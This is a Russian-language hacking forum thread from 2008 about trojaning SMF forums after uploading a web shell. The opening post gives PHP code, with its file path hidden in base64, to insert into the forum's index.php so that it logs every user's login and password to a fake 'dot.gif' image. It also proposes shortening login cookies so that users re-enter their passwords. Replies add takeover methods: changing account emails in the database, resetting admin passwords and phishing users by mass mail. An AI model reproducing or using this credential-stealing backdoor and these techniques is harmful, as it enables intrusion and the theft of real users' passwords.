Форумы Трояним Smf (узнаём пассы имея шелл)

Discussion in 'Уязвимости CMS/форумов' started by n-000, 29 Apr 2008.

  1. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    Хочу рассказать о том , как можно узнать пассы юзверей форума, предварительно залив на него шелл, даже если ваш шелл найдуд и захреначат, то у вас будет шанс подсмотреть пасс админа ... если ваш троянец останется в скриптах форума !

    Ну скажем вы нашли хэш админа -) расшифровали и залили шелл ) ну а как узнать пасы остальных ? брутить !
    Да ну нах ) можно же всё зделать проще ) Пусть юзвери сами пришлют вам свой пасс ) Как ?
    Естесно впихнуть небольшого троянца, который будет пасти ввод логина и пасса в поля и сохранять их на том же серваке где и форум...
    ПАЛЕВО !!!! скажите -)
    Да нет -)
    Идём в ../forum/Themes/default/images создаём там файлик dot.gif дальше пляшем от него -)
    Итак, есть файлик и в него будем сейвить пасы )
    Не будем мазать сопли по тарелке и переходим непосредственно к скрипту ...
    PHP:
    $patch_ getcwd().base64_decode('L1RoZW1lcy9kZWZhdWx0L2ltYWdlcy9kb3QuZ2lm');
            
    $patch_ str_replace("\\","/",$patch_); 

    if(isset(
    $_POST['user']) != '' && isset($_POST['passwrd']) != '')
          {  
            
    $f_l fopen($patch_,'a+');      
       
    fwrite($f_l,$_POST['user'].' : '.$_POST['passwrd']."\n");  
           
    fclose($f_l);      
    }

    этот скрипт мы прячем вподальше в index.php самого форума, ну например около 63 строки ... которая начинается с коментария ( // Connect to the MySQL database. )
    После него вставляем сам скрипт !
    Думаю если у вас хватило прыти залить шелл, то понять то, что зашифровано в base64 для вас загадкой не будет.
    Ну а теперь у вас есть троянец который будет записывать в /forum/Themes/default/images/dot.gif все пассы которые вводят юзвери в соответствующие поля !
    Можно у себя на серваке зделать парсер данного файла и просматривать пассы как угодно, по алфавиту или по дате добавления -) как вам угодно ))

    А что если юзверь авторизуется через куки и пасс вообще не вводит ?
    Да это трабла ) ведь тогда наш троянец бездействует и не ловит таких засранцев )
    Но и на таких есть управа -)
    Можно создать жабаскрипт который перепишет куки юзверю, скажем не на постоянный логин, а на пару часов! И после того как ламера лягут спать их куки удаляца, ну и конечно их попросит форум ввести пасс снова, ну а дальше вы сами всё знаете...
    Удачи вам в вашем нелёгком, но я думаю правильном направлении !
     
    #1 n-000, 29 Apr 2008
    Last edited: 29 Apr 2008
    1 person likes this.
  2. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    892
    Likes Received:
    300
    Reputations:
    530
    а ещё можно
    через шел смотрим конфиг, лезем с него же в мускуль, меняем мыло на своё левое мыло тому юзеру чей пас очень срочно нуно узнать и после делаем ретрив пароля :d

    а ещё можно сменить временно пас админа который не брутиться ( опять же шелл в помошь ) залезть в панель админа форума, если есть возможность увидеть пас в открытом виде узверя который так сволочь тебе нужен аж ппц то всё чисто-гладко,
    если не видно - то ты как наделённый правами админа :) шлёшь письмо от лица администратора письмо тому горемыки, чтоб он вражина в срочном порядке подтвердил что он не забыл свой пас и выслал его тебе на мыло в подтверждение - можно сделать массовую рассылку :d

    P.s. у многих в подписе вижу: КУПЛЮ ШЕЛЛ С ВОЗМОЖНОСТЬЮ ЗАПИСИ В ИНДЕКС - что значит, другие варианты пролетают, шеллы ваши мы не купим.
    А что мешает проделать тоже самое ( о чём не сложно догадаться ) на том шелле где нет прав на редактирования файла? Ничего!
    Временная смена паса админу через мускуль (ну если тока речь не идёт об авторизации по Ip ) - заход в админку (правда я встречал такие админки, что как обычным юзером себя чувствуешь - минимализм ) - и меняй что те нуно.... ИМХО в 80% случаев это проканает на ура.
     
  3. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    А можно поподробнее, а то у меня с явой никак
     
    #3 ty13r, 4 May 2008
    Last edited: 4 May 2008
  4. Neorin

    Neorin Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    48
    Likes Received:
    15
    Reputations:
    0
    а че нить такое можно с Ipb Замутить?...млина неплохо было бы!
     
    1 person likes this.
  5. Rogun

    Rogun Elder - Старейшина

    Joined:
    12 Feb 2008
    Messages:
    76
    Likes Received:
    4
    Reputations:
    0
    где же взять шелл для проделывания таких крутых вещей? :) или хотя бы где его взять для IPB 1.3 Final?
     
  6. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
  7. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    Там эта фишка работает с мускулем и создаёт там левое табло, которое спалят (ИМХО) быстрей, чем неприметную картинку на серваке ...
     
  8. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    Ну шел можно взять например от маднета... а как залить его на IPB смотри ТУТ , версия не совпадает но можно попробывать.
     
  9. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    да ладно, это ж как он ретривнется, если в бд он в хеше хранится? точно не помню, но пасс полюбому новый присылается рандомный.
     
    _________________________
    1 person likes this.
  10. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    а невориант посмотреть с конфиге логин и пас к мускул зайти в неё через шел и там посмотреть все пасы пользователей? но при этом открыть страницу md5.xek.cc
     
  11. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Хеш то соленый, тем более что в smf шифруется не md5() а sha(), а для него таких обьемных баз нету
     
  12. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Способ не оч хороший…или не доработанный …записи идут где пароли звёздочками закрыты ..где кодировка левая…..
     
  13. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Давно хотел спросить, от чего такое происходит. Разве скрипту они присылаются в таком виде?
     
  14. n-000

    n-000 Elder - Старейшина

    Joined:
    25 Oct 2006
    Messages:
    90
    Likes Received:
    36
    Reputations:
    5
    А я вот и думаю от чего он так, скрипт то сработает, то фигню запишет ... может это жабаскрипт в форуме всё портит ? пока не разобрался
     
  15. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Когда я пытался сделать тоже самое не уровне бд получалось то же самое, ява не виновата, походу это что-то связанное с сессиями/куками
     
  16. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Здесь набросал небольшой мануал. Если есть дополнения или улучшения пишите в личку
     
  17. Gitarist

    Gitarist Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    36
    Likes Received:
    4
    Reputations:
    -3
    Добрые люди, скажите, что такое "шелл" ???
     
  18. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    139
    Reputations:
    31
    а если пасс будет например ][Ott@быч
    твой md5.xek.cc будет брутить его вечно)
    по поводу кук, я с Smf не сталкивался но скорей всего можно просто уменьшить время существования сессии.
     
    #18 }{0TT@БЬ)Ч, 29 May 2008
    Last edited: 29 May 2008
  19. Gitarist

    Gitarist Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    36
    Likes Received:
    4
    Reputations:
    -3
    Сори за флуд :(

    Скажите пожалуйста, что такое "шелл" и "хеш" ??? и если можно, дайте ссыль на расшифровку подобных сокращений )) заранее спасибо!
     
Loading...